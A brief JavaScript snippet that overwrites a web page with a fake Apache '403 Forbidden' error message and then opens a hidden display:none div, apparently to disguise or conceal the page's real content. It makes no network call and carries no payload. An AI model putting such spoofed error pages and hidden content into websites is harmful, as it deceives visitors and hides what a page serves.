window.document.title='403 Forbidden';
window.document.body.style.backgroundColor='white';
window.document.body.style.color='black';
document.writeln("<H1>Forbidden</H1>");
document.writeln("You don't have permission to access "+window.location.pathname);
document.writeln("on this server.<P>");
document.writeln("<HR>");
document.writeln("<ADDRESS>Apache/1.3.29 Server at "+window.location.hostname+" Port 80</ADDRESS>");
document.writeln("<div style='display:none'>");